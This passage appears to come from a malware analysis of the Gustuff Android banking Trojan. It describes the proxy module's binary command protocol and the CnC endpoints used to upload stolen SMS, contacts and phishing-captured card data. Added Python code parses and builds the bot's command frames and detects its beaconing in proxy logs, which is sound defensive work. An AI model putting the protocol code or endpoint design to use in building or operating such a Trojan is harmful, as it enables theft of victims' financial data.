5. Switches to waiting for commands from the server. Commands from the server have the following layout:
- offset 0: command
- offset 1: sessionId
- offset 2: length
- offset 4: data
When a command arrives, the application logs the following:
mainLog("Header { sessionId[<%id%>], type[<%command%>], length[<%length%>] }")
The following commands are possible from the server:
Name | Command | Data | Description |
---|---|---|---|
connectionId | 0 | Connection ID | Create a new connection |
SLEEP | 3 | Time | Pause the proxy module |
PING | 4 | - | Send a PONG message |
The PONG message consists of 4 bytes and looks like this: 0x04000000.
On receiving the connectionId command (to create a new connection), CommandConnection creates an instance of the ProxyConnection class.
- Two classes take part in proxying: ProxyConnection and end. When the ProxyConnection class is created, it connects to the address ProxyConfigClass.host:ProxyConfigClass.proxyPort and passes the JSON object:
{
"id":<%connectionId%>
}
In response, the server sends a SOCKS5 message containing the address of the remote server to which a connection must be established. Interaction with that server goes through the end class. Schematically, the connection is set up in that order: ProxyConnection registers its connectionId on the proxy port, the server replies with the SOCKS5 target, and end relays traffic to it.
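A parser for the command frames of the proxy module, as an added Python example (not the sample's code and not from the Group-IB analysis): it implements the header layout given above, keeps an incomplete frame in the buffer until the rest arrives, produces the mainLog line the sample writes on arrival, and answers PING with PONG. The analysis does not state the byte order of the 2-byte length field; big-endian is assumed here. Note that the 4-byte PONG value 0x04000000 is exactly a PING header with sessionId 0 and length 0, which the test below checks.

```python
import struct
from dataclasses import dataclass

# Header layout from the analysis: byte 0 command, byte 1 sessionId, bytes 2-3 length,
# payload from byte 4. Byte order of the length field is assumed big-endian.
HEADER = struct.Struct(">BBH")
CMD_CONNECTION_ID, CMD_SLEEP, CMD_PING = 0, 3, 4
CMD_NAMES = {CMD_CONNECTION_ID: "connectionId", CMD_SLEEP: "SLEEP", CMD_PING: "PING"}
PONG = b"\x04\x00\x00\x00"   # the 4-byte PONG reply given in the analysis


@dataclass
class Frame:
    command: int
    session_id: int
    data: bytes

    @property
    def name(self) -> str:
        return CMD_NAMES.get(self.command, f"unknown({self.command})")


def parse_frames(buf: bytes):
    """Split a byte stream into frames; returns (frames, leftover) so partial reads are kept."""
    frames, off = [], 0
    while len(buf) - off >= HEADER.size:
        cmd, sid, length = HEADER.unpack_from(buf, off)
        end = off + HEADER.size + length
        if end > len(buf):
            break  # incomplete frame: wait for more data before consuming it
        frames.append(Frame(cmd, sid, buf[off + HEADER.size:end]))
        off = end
    return frames, buf[off:]


def build_frame(command: int, session_id: int, data: bytes = b"") -> bytes:
    """Encode a frame in the same layout (useful for a test server or replay)."""
    return HEADER.pack(command, session_id, len(data)) + data


def log_header(frame: Frame) -> str:
    """Same wording as the mainLog line the sample writes when a command arrives."""
    return f"Header {{ sessionId[{frame.session_id}], type[{frame.command}], length[{len(frame.data)}] }}"


def respond(frame: Frame):
    """Reply the bot side would produce: PONG for PING, nothing for the other commands."""
    if frame.command == CMD_PING:
        return PONG
    return None


# Constructed stream: a PING, a connectionId carrying two data bytes, and a stray byte.
SAMPLE_STREAM = build_frame(CMD_PING, 0) + build_frame(CMD_CONNECTION_ID, 7, b"\x00\x2a") + b"\x03"

if __name__ == "__main__":
    frames, rest = parse_frames(SAMPLE_STREAM)
    for f in frames:
        print(f.name, log_header(f), respond(f))
    print("leftover:", rest)
```

When writing a decoder for captured traffic, confirm the byte order on a real frame first: a SLEEP or connectionId frame with a non-trivial payload reveals whether the length is stored big- or little-endian.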
Network interaction
To prevent network sniffing and traffic analysis, the interaction between the CnC server and the application can be protected with SSL. All data exchanged with the server is JSON. During its operation the application makes the following requests:
- http://<%CnC%>/api/v1/set_state.php: result of command execution.
- http://<%CnC%>/api/v1/get.php: receiving commands.
- http://<%CnC%>/api/v1/load_sms.php: uploading SMS messages from the infected device.
- http://<%CnC%>/api/v1/load_ab.php: uploading the contact list from the infected device.
- http://<%CnC%>/api/v1/aevents.php: the request is made when a parameter in the settings file is updated.
- http://<%CnC%>/api/v1/set_card.php: uploading data obtained through the phishing window disguised as Google Play Market.
- http://<%CnC%>/api/v1/logs.php: uploading log data.
- http://<%CnC%>/api/v1/records.php: uploading data obtained through phishing windows.
- http://<%CnC%>/api/v1/set_error.php: reporting an error that occurred.
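The endpoint list above is what a SOC would hunt for in web proxy logs. The Python block below is an added detection example (not from the Group-IB analysis) that flags a client which touched at least two distinct Gustuff endpoints on the same host, which is what the poll/report cycle (get.php followed by set_state.php) produces; a single hit on a path as generic as /api/v1/get.php is not enough on its own. The log lines are constructed in a simple "epoch client method url" layout; example.com and intranet.invalid are reserved names. Adapt LINE_RE to the proxy format in use.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# URI paths from the analysis; individually generic, together a usable fingerprint.
GUSTUFF_PATHS = frozenset({
    "/api/v1/get.php", "/api/v1/set_state.php", "/api/v1/load_sms.php",
    "/api/v1/load_ab.php", "/api/v1/aevents.php", "/api/v1/set_card.php",
    "/api/v1/logs.php", "/api/v1/records.php", "/api/v1/set_error.php",
})

# "epoch client method url" records; constructed for this example, not real traffic.
SAMPLE_LOG = """\
1552650001.123 10.0.0.5 POST http://88.99.171.105/api/v1/get.php
1552650002.200 10.0.0.5 POST http://88.99.171.105/api/v1/set_state.php
1552650003.500 10.0.0.9 GET http://example.com/api/v1/get.php
1552650061.000 10.0.0.5 POST http://88.99.171.105/api/v1/get.php
1552650070.000 10.0.0.7 POST http://intranet.invalid/api/v1/logs.php
garbage line that must not break the parser
"""

LINE_RE = re.compile(r"^(?P<ts>\d+(?:\.\d+)?)\s+(?P<client>\S+)\s+(?P<method>\S+)\s+(?P<url>\S+)$")


def parse_log(text: str):
    """Yield one dict per well-formed record; malformed lines are skipped, not fatal."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["ts"] = float(rec["ts"])
            yield rec


def find_beacons(text: str, min_paths: int = 2) -> dict:
    """Group hits by (client, host) and keep pairs that touched >= min_paths distinct endpoints.

    Returns {(client, host): {"paths": [...], "first": ts, "last": ts}}.
    """
    hits = defaultdict(lambda: {"paths": set(), "first": None, "last": None})
    for rec in parse_log(text):
        u = urlsplit(rec["url"])
        if u.path not in GUSTUFF_PATHS:
            continue
        entry = hits[(rec["client"], u.netloc)]
        entry["paths"].add(u.path)
        entry["first"] = rec["ts"] if entry["first"] is None else min(entry["first"], rec["ts"])
        entry["last"] = rec["ts"] if entry["last"] is None else max(entry["last"], rec["ts"])
    return {
        key: {"paths": sorted(v["paths"]), "first": v["first"], "last": v["last"]}
        for key, v in hits.items() if len(v["paths"]) >= min_paths
    }


if __name__ == "__main__":
    for (client, host), info in find_beacons(SAMPLE_LOG).items():
        print(f"{client} -> {host}: {info['paths']} between {info['first']} and {info['last']}")
```

The first/last timestamps are kept so that a second pass can check for the periodic polling of get.php that the analysis describes; in the constructed log the flagged client returns to get.php roughly a minute after its first poll.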
Recommendations
To protect their customers from the threat of mobile Trojans, companies need to use comprehensive solutions that can monitor and prevent malicious activity without installing additional software on user devices.
This requires strengthening signature-based methods of detecting mobile Trojans with technology that analyzes the behavior of both the client and the application itself. The protection should also include device identification using digital fingerprinting, which makes it possible to see when an account is being used from an atypical device that has already fallen into a fraudster's hands.
A fundamentally important point is the availability of cross-channel analysis, which lets companies control the risks that arise not only on the Internet but also in the mobile channel, for example in mobile banking applications and in applications for transactions with cryptocurrencies and other financial transactions.
Safety rules for users:
- Do not install applications from sources other than Google Play on Android devices, and pay special attention to the permissions an application requests.
- Install Android OS updates regularly.
- Pay attention to the extensions of downloaded files.
- Do not visit suspicious resources.
- Do not click links received in SMS messages.
Author: Semyon Rogachev, junior malware research specialist at the Group-IB Computer Forensics Laboratory.
Source: habr.com